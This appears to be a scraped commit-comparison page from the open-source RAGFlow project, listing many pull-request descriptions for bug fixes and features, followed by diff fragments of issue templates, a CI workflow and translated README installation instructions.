Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Resolved a bug where sibling components in Canvas were not
restricted to fetching data from the upstream when parallel components
were present.
Issue: When parallel components existed in Canvas, sibling components
incorrectly fetched data without being limited to the upstream scope,
causing data retrieval issues.
Solution: Adjusted the data fetching logic to ensure sibling components
only retrieve data from the upstream scope.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add fallback for PDF figure parser
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Optimize setting configuration initialization to resolve Minio
initialization error caused by using a specific storage.
Reproduction Scenario:
Using Aliyun OSS as the backend storage with the STORAGE_IMPL
environment variable set to OSS.
The service_conf.yaml.template configuration file contains OSS-related
configurations, while other storage configurations are commented out.
When the service starts, it still attempts to initialize the Minio
storage. Since there is no Minio configuration in
service_conf.yaml.template, it results in an error due to the missing
configuration file.
Optimization Measures:
Automatically determine the required initialization configuration based
on the environment variable.
Do not initialize configurations for unused resources.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add VLM-boosted PDF parser if VLM is set.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: In the Agent's workflow, the input content cannot be wrapped, and
\n will not work, otherwise an error will be reported #6241
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When using LLM for auto-tag, if there are no examples, the tag format
generated by LLM may be wrong. This will cause Elasticsearch insert
errors. Adding basic examples can avoid this problem.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Alter TreeView component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add history version save
- Allows users to view and download agent files by version revision
history

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Blank and createFromNothing were not read from the i18n file when Agent
was created
创建Agent的时候 Blank 和 createFromNothing 没从i18n文件中读取
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix#5719
Add data type validation for parser_config
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Alter TransferList props #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add vision LLM PDF parser
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Add support for non-stream response with session.ask_without_stream and
fix a typo mistake in python API doc
There are requirements for non-stream response, especially for commands
exection, e.g. text2SQL. The commands have to be completed before the
agent is triggered.
### What problem does this PR solve?
It's to fix the [Issue:
6206](https://github.com/infiniflow/ragflow/issues/6206)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Howard WU <yuanhao.wu@ifudata.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add TreeView component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
For the create_inputs method based on np operation to replace for loop
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
This pull request (PR) incorporates codes for parsing PPTX files, aiming
to more precisely depict text in list formats (hint list by .).
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix: Fixed the issue that events cannot be triggered after the shadcn-ui
dialog is closed#3221.
Refer to [Combobox in a form in a dialog isn't working.
#1748](https://github.com/shadcn-ui/ui/issues/1748#issuecomment-2720130543)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Regards kb_id at ElasticSearch insert, update, delete. Close#6066
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolve document concurrent upload issue. #6039
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Knowledge base page cannot upload folders #6062
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Prevent password boxes other than login passwords from displaying
passwords saved in the browser's password manager by default. #6033
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Change “Document parser” to "PDF parser" #6072
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
AWS Bedrock has made deepseek-r1 available on its serverless inference.
This adds the R1 serverless model for use via the bedrock model
abilities.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…ions
### What problem does this PR solve?
This PR fixes an issue where the application was repeatedly reading the
llm_factories.json file from disk in multiple places, which could lead
to "Too many open files" errors under high load conditions. The fix
centralizes the file reading operation in the settings.py module and
stores the data in a global variable that can be accessed by other
modules.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
- The API documentation lacks detailed error code explanations. Added
error code tables to `python_api_reference.md` and
`http_api_reference.md` to clarify possible error codes and their
meanings.
- Error handling in the codebase is inconsistent. Standardized error
handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`.
- Improved API comments by adding standardized docstrings to enhance
code readability and maintainability.
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
fix chat_completion answer data incorrect
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: renqi <renqi08266@fxomail.com>
### What problem does this PR solve?
Optimize OCR garbage identification to reduce unnecessary filtering.
#5713
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Set the default value of Chunk token number to 512 #6016
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add CSV file parsing support #4552, #5849, #5870
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Alter Item to TransferListItemType #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Why can't Retrieval component support internet web search. #5973
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…session_id does not exist in the session
For an Agent with an Input Begin value, on the first call the return
session_id does not exist in the session
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
When creating and updating chats, add a check for the parsing status of
knowledge base documents. Ensure that all documents have been parsed
before allowing chat creation to improve user experience and system
stability.
**Main Changes:**
- Add document parsing status check logic in `chat.py`.
- Implement the `is_parsed_done` method in `knowledgebase_service.py`.
- Prevent chat creation when documents are being parsed or parsing has
failed.
### What problem does this PR solve?
fix this bug:https://github.com/infiniflow/ragflow/issues/5960
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
This commit refactors the deep research module (deep_research.py), with
the following major improvements: The complex thinking and retrieval
logic has been broken down into multiple independent private methods,
enhancing code readability and maintainability. Static methods and class
methods have been introduced to simplify the logic for tag processing.
The search and reasoning processes have been optimized, increasing the
modularity of the code. The flexibility of information retrieval and
processing has been improved. The refactored code structure is now
clearer, making it easier to understand and extend the functionality of
the deep research module.
### What problem does this PR solve?
increase the modularity of the code
### Type of change
- [x] Refactoring
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
Fixes#5923
Fixes the readonly variables from payload at
/datasets/<dataset_id>
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
Now if user tries to modify readonly values then it will show " The
input parameters are invalid. "
invalid_keys = {"id", "embd_id", "chunk_num", "doc_num", "parser_id",
"create_date", "create_time", "created_by",
"status","token_num","update_date","update_time"}
if any(key in req for key in invalid_keys):
return get_error_data_result(message="The input parameters are
invalid.")
i have include those readonly keys in invalid_keys
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Raghav <2020csb1115@iitrpr.ac.in>
### What problem does this PR solve?
Fix:signal.SIGUSR1 and signal.SIGUSR2 can't use in window. so don't bind
signal.SIGUSR1 and signal.SIGUSR2 in the windows env
### Type of change
- [✓ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: tangyu <1@1.com>
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: renqi <renqi08266@fxomail.com>
### What problem does this PR solve?
Feat: Add Breadcrumb component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add Support for german language
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed #5839
This PR fix error code 102, stating dataset_ids is required.
curl --request POST \
--url http://{address}/api/v1/chats \
--header 'Content-Type: application/json' \
--header 'Authorization: Bearer <YOUR_API_KEY>' \
--data '{
"name": "test_chat"
}'
this is not getting datasetids , fix for it.
file location : sdk\python\ragflow_sdk\ragflow.py
added : "dataset_ids": dataset_list if dataset_list else [],
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Raghav <2020csb1115@iitrpr.ac.in>
### What problem does this PR solve?
Feat: Add AvatarGroup component. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
**generate.py 更新:**
问题:部分模型提供商对输入对话内容的格式有严格校验,要求第一条内容的 role 不能为 assistant,否则会报错。
解决:删除了系统设置的 agent 开场白,确保传递给模型的对话内容中,第一条内容的 role 不为 assistant。
**retrieval.py 更新:**
问题:当前知识库检索使用全部对话内容作为输入,可能导致检索结果不准确。
解决:改为仅使用用户最后提出的一个问题进行知识库检索,提高检索的准确性。
**Update generate.py:**
Issue: Some model providers have strict validation rules for the format
of input conversation content, requiring that the role of the first
content must not be assistant. Otherwise, an error will occur.
Solution: Removed the system-set agent opening statement to ensure that
the role of the first content in the conversation passed to the model is
not assistant.
**Update retrieval.py:**
Issue: The current knowledge base retrieval uses the entire conversation
content as input, which may lead to inaccurate retrieval results.
Solution: Changed the retrieval logic to use only the last question
asked by the user for knowledge base retrieval, improving retrieval
accuracy.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Performance Improvement
When accessing the /api/v1/agents/{agent_id}/completions API, sessions
created before agent modifications retain the old DSL data. To use the
latest agent configuration (like new prompts) in historical sessions, I
added the sync_dsl parameter. It defaults to False to maintain existing
behavior and only synchronizes when set to True. If needed, a manual
synchronization API can be created to trigger the sync explicitly.
### What problem does this PR solve?
Fix: keyword compont display issue #5794
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: When selecting a reordering model, give a prompt that it takes too
long. #5834
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add TransferList component. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The `/api/v1/chats` API endpoint was broken, any GET request got the
following response:
```
{"code":100,"data":null,"message":"TypeError(\"'int' object is not callable\")"}
```
With this log ragflow-server side:
```
2025-03-07 14:36:26,297 ERROR 20 'int' object is not callable
Traceback (most recent call last):
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
rv = self.dispatch_request()
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
File "/ragflow/api/utils/api_utils.py", line 303, in decorated_function
return func(*args, **kwargs)
File "/ragflow/api/apps/sdk/chat.py", line 323, in list_chat
logging.WARN(f"Don't exist the kb {kb_id}")
TypeError: 'int' object is not callable
2025-03-07 14:36:26,298 INFO 20 172.18.0.6 - - [07/Mar/2025 14:36:26] "GET /api/v1/chats HTTP/1.1" 200 -
```
This was caused by the incorrect use of `logging.WARN` as a method (it's
a loglevel object), instead of the correct `logging.warning()` method.
This PR fixes that, and also rewrites the message to be grammaticaly
correct.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
vLLM provider with a reranking model does not work : as vLLM uses under
the hood the [CoHereRerank
provider](https://github.com/infiniflow/ragflow/blob/v0.17.0/rag/llm/__init__.py#L250)
with a `base_url`, if this URL [is not passed to the Cohere
client](https://github.com/infiniflow/ragflow/blob/v0.17.0/rag/llm/rerank_model.py#L379-L382)
any attempt will endup on the Cohere SaaS (sending your private api key
in the process) instead of your vLLM instance.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
fix:when start with source code not in docker env report
"UnicodeDecodeError: 'gbk' codec can't decode byte 0xad in position 5:
illegal multibyte sequence" in windows
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: tangyu <1@1.com>
### What problem does this PR solve?
Fixed the issue of "stop deleting when encountering invalid dataset ID"
#5760
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Enhance the recognition of both borderless and bordered Markdown tables.
Add support for extracting HTML tables, including various scenarios with
nested HTML tags. Improve performance by using conditional checks to
reduce unnecessary regular expression matching.
### What problem does this PR solve?
Optimize the table extraction logic in the Markdown parser:
Enhance the recognition of both borderless and bordered Markdown tables.
Add support for extracting HTML tables, including various scenarios with
nested HTML tags.
Improve performance by using conditional checks to reduce unnecessary
regular expression matching.
### Type of change
- [x] Performance Improvement
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
1. **Issue**: When calling `list_agent_session` via the HTTP API, users
may only need to display conversation messages, and do not want to see
the associated dsl, which can be very large. Therefore, consider adding
a control option to determine whether the DSL should be returned, with
the default being to return it.
2. **Documentation Discrepancy**: In the HTTP API documentation, under
"List agent sessions," the "Response" section states that the "data"
field is a dictionary when "success" is returned. However, the actual
returned data is a list. This discrepancy has been corrected.
### What problem does this PR solve?
Fix: Fixed the issue that files cannot be uploaded on the file
management page. #5730
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
The `dialog_id` field was inconsistently defined:
- In the `migrate_db()` function, it was set to `null=True`.
- In the model class, it was defined as `null=False`.
This inconsistency caused an issue during the initial deployment where
the database table did not allow `dialog_id` to be null. As a result,
calling `APITokenService.save(**obj)` in `system_app.py` raised the
following error:
```
peewee.IntegrityError: null value in column "dialog_id" violates not-null constraint
```
### What problem does this PR solve?
Error: peewee.IntegrityError: null value in column "dialog_id" violates
not-null constraint
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
close#5730
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: yihong0618 <zouzou0208@gmail.com>
### What problem does this PR solve?
Fix: Remove the document language parameter. #5686
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Remove the max token parameter. #5640#5646
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add rerank option to huggingface's model type drop-down box. #5658
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Use react-hook-form to synchronize the data of the categorize form
to the agent node. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The parsing method is paper and needs to display Document parser.
#5467
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Refactored DocumentService.update_progress
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The `ocr.res` file is already included in the model directory
`rag/res/deepdoc`, but it doesn't seem to be utilized here.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
close issue #5600
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: yihong0618 <zouzou0208@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Performance Improvement
---------
Co-authored-by: wangwei <dwxiayi@163.com>
### What problem does this PR solve?
Fix the issue where, when getting a user's APIToken, if the user is part
of another user's team, it incorrectly gets the Team owner's APIToken
instead.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Render DynamicCategorize with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render MessageForm with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
As title export PYTHONPATH in the shell
### Type of change
- [x] Refactoring
Signed-off-by: yihong0618 <zouzou0208@gmail.com>
### What problem does this PR solve?
Introduced jemalloc.
Python uses pymalloc (which is an reimplementation of gblibc malloc) to
manage RES. It has pools for small objects to avoid returning memory to
OS aggressively. My experience is: Replacing pymalloc with
[jemalloc](https://github.com/jemalloc/jemalloc) can reduce RES and
speedup task_executor.py.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix may lose part of information of last stream chunck
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds a new Kubernetes Service resource to the Helm chart which
specifically targets the RAGFlow API. This feature useful for cases
where you want to expose the RAGFlow HTTP API separately from the web
interface, for example if RAGFlow is running behind an authenticating
proxy it allows a route to bypass the proxy (e.g. by defining a separate
ingress resource which forwards to the separate API-only k8s service
added here) to provide RAGFlow API access. This is still secure since
API access is already authenticated by API keys inside RAGFlow itself.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: LLM with ___ return cannot be deleted #5585
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Render WikipediaForm and BaiduForm with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
the api doc is too long, add a toc might be better

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Render QWeatherForm with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add sessions deletion support for agent in http and python api
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Render RewriteQuestionForm with shadcn-ui #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Combine Select and LlmSettingFieldItems into LLMSelect. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add NextLLMSelect with shadcn-ui. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This pull request aims to fix a bug that prevents certain email
addresses from signing up. The affected TLDs were returning 'invalid
email address' errors:
.museum
.software
.photography
.technology
.marketing
.education
.international
.community
.construction
.government
.consulting
....
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
close#5277 by make sure the file close
### Type of change
- [x] Performance Improvement
---------
Signed-off-by: yihong0618 <zouzou0208@gmail.com>
2025-03-03 10:26:45 +08:00
2215 changed files with 236957 additions and 96275 deletions
description:Propose a agent scenario request for RAGFlow.
title:"[Agent Scenario Request]: "
labels:["❤️🔥ᴬᴳᴱᴺᵀ agent scenario"]
body:
- type:checkboxes
attributes:
label:Self Checks
description:"Please check the following in order to be responded in time :)"
options:
- label:I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
required:true
- label:I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:"Please do not modify this template :) and fill in all the required fields."
required:true
- type:textarea
attributes:
label:Is your feature request related to a scenario?
description:|
A clear and concise description of what the scenario is. Ex. I'm always frustrated when [...]
render:Markdown
validations:
required:false
- type:textarea
attributes:
label:Describe the feature you'd like
description:A clear and concise description of what you want to happen.
validations:
required:true
- type:textarea
attributes:
label:Documentation, adoption, use case
description:If you can, explain some scenarios how users might use this, situations it would be helpful in. Any API designs, mockups, or diagrams are also helpful.
render:Markdown
validations:
required:false
- type:textarea
attributes:
label:Additional information
description:|
Add any other context or screenshots about the feature request here.
label:Is there an existing issue for the same bug?
description:Please check if an issue already exists for the bug you encountered.
label:Self Checks
description:"Please check the following in order to be responded in time :)"
options:
- label:I have checked the existing issues.
required:true
- label:I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
required:true
- label:I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:"Please do not modify this template :) and fill in all the required fields."
required:true
- type:markdown
attributes:
value:"Please provide the following information to help us understand the issue."
description:Propose a feature request for RAGFlow.
title:"[Feature Request]: "
labels:[feature request]
labels:["💞 feature"]
body:
- type:checkboxes
attributes:
label:Is there an existing issue for the same feature request?
description:Please check if an issue already exists for the feature you request.
label:Self Checks
description:"Please check the following in order to be responded in time :)"
options:
- label:I have checked the existing issues.
- label:I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
required:true
- label:I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:"Please do not modify this template :) and fill in all the required fields."
description:"Please check the following in order to be responded in time :)"
options:
- label:I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
required:true
- label:I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:"Please do not modify this template :) and fill in all the required fields."
# Calculate the hash of the current workspace content
HEAD_SHA=$(git rev-parse HEAD^{tree})
if [[ "${HEAD_SHA}" == "${PR_SHA}" ]]; then
echo "Cancel myself since the workspace content hash is the same with PR #${PR_NUMBER} merged. See ${GITHUB_SERVER_URL}/${GITHUB_REPOSITORY}/actions/runs/${PR_RUN_ID} for details."
gh run cancel ${GITHUB_RUN_ID}
while true; do
status=$(gh run view ${GITHUB_RUN_ID} --json status -q .status)
[ "${status}" = "completed" ] && break
sleep 5
done
exit 1
fi
fi
fi
elif [[ ${GITHUB_EVENT_NAME} == "pull_request" ]]; then
if:always() # always run this step even if previous steps failed
run:|
sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml down -v
# Sometimes `docker compose down` fail due to hang container, heavy load etc. Need to remove such containers to release resources(for example, listen ports).
| tar -xf - --strip-components=2 -C /root/.ragflow)\
fi
# https://github.com/chrismattmann/tika-python
# This is the only way to run python-tika without internet access. Without this set, the default is to check the tika version and pull latest every time from Apache.
- 🔧 [Build a docker image without embedding models](#-build-a-docker-image-without-embedding-models)
- 🔧 [Build a docker image including embedding models](#-build-a-docker-image-including-embedding-models)
- 🔧 [Build a Docker image](#-build-a-docker-image)
- 🔨 [Launch service from source for development](#-launch-service-from-source-for-development)
- 📚 [Documentation](#-documentation)
- 📜 [Roadmap](#-roadmap)
@ -62,29 +72,28 @@
## 💡 What is RAGFlow?
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document
understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models)
to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted
data.
[RAGFlow](https://ragflow.io/) is a leading open-source Retrieval-Augmented Generation (RAG) engine that fuses cutting-edge RAG with Agent capabilities to create a superior context layer for LLMs. It offers a streamlined RAG workflow adaptable to enterprises of any scale. Powered by a converged context engine and pre-built agent templates, RAGFlow enables developers to transform complex data into high-fidelity, production-ready AI systems with exceptional efficiency and precision.
## 🎮 Demo
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
> If you have not installed Docker on your local machine (Windows, Mac, or Linux),
> see [Install Docker Engine](https://docs.docker.com/engine/install/).
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.
> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
3. Start up the server using the pre-built Docker images:
> The command below downloads the `v0.17.0-slim` edition of the RAGFlow Docker image. Refer to the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.17.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.17.0` for the full edition `v0.17.0`.
> [!CAUTION]
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, follow [this guide](https://ragflow.io/docs/dev/build_docker_image) to build a Docker image compatible with your system.
```bash
> The command below downloads the `v0.22.1` edition of the RAGFlow Docker image. See the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.22.1`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server.
```bash
$ cd ragflow/docker
$ docker compose -f docker-compose.yml up -d
```
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
- 🔨 [Meluncurkan aplikasi dari Sumber untuk Pengembangan](#-meluncurkan-aplikasi-dari-sumber-untuk-pengembangan)
- 📚 [Dokumentasi](#-dokumentasi)
- 📜 [Peta Jalan](#-peta-jalan)
@ -62,25 +72,29 @@
## 💡 Apa Itu RAGFlow?
[RAGFlow](https://ragflow.io/) adalah mesin RAG (Retrieval-Augmented Generation) open-source berbasis pemahaman dokumen yang mendalam. Platform ini menyediakan alur kerja RAG yang efisien untuk bisnis dengan berbagai skala, menggabungkan LLM (Large Language Models) untuk menyediakan kemampuan tanya-jawab yang benar dan didukung oleh referensi dari data terstruktur kompleks.
[RAGFlow](https://ragflow.io/) adalah mesin RAG (Retrieval-Augmented Generation) open-source terkemuka yang mengintegrasikan teknologi RAG mutakhir dengan kemampuan Agent untuk menciptakan lapisan kontekstual superior bagi LLM. Menyediakan alur kerja RAG yang efisien dan dapat diadaptasi untuk perusahaan segala skala. Didukung oleh mesin konteks terkonvergensi dan template Agent yang telah dipra-bangun, RAGFlow memungkinkan pengembang mengubah data kompleks menjadi sistem AI kesetiaan-tinggi dan siap-produksi dengan efisiensi dan presisi yang luar biasa.
## 🎮 Demo
Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
@ -133,6 +147,10 @@ Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Hanya diperlukan jika Anda ingin menggunakan fitur eksekutor kode (sandbox) dari RAGFlow.
> [!TIP]
> Jika Anda belum menginstal Docker di komputer lokal Anda (Windows, Mac, atau Linux), lihat [Install Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Menjalankan Server
@ -157,33 +175,48 @@ Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
3. Bangun image Docker pre-built dan jalankan server:
> Perintah di bawah ini mengunduh edisi v0.17.0-slim dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.17.0-slim, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server. Misalnya, atur RAGFLOW_IMAGE=infiniflow/ragflow:v0.17.0 untuk edisi lengkap v0.17.0.
> [!CAUTION]
> Semua gambar Docker dibangun untuk platform x86. Saat ini, kami tidak menawarkan gambar Docker untuk ARM64.
> Jika Anda menggunakan platform ARM64, [silakan gunakan panduan ini untuk membangun gambar Docker yang kompatibel dengan sistem Anda](https://ragflow.io/docs/dev/build_docker_image).
```bash
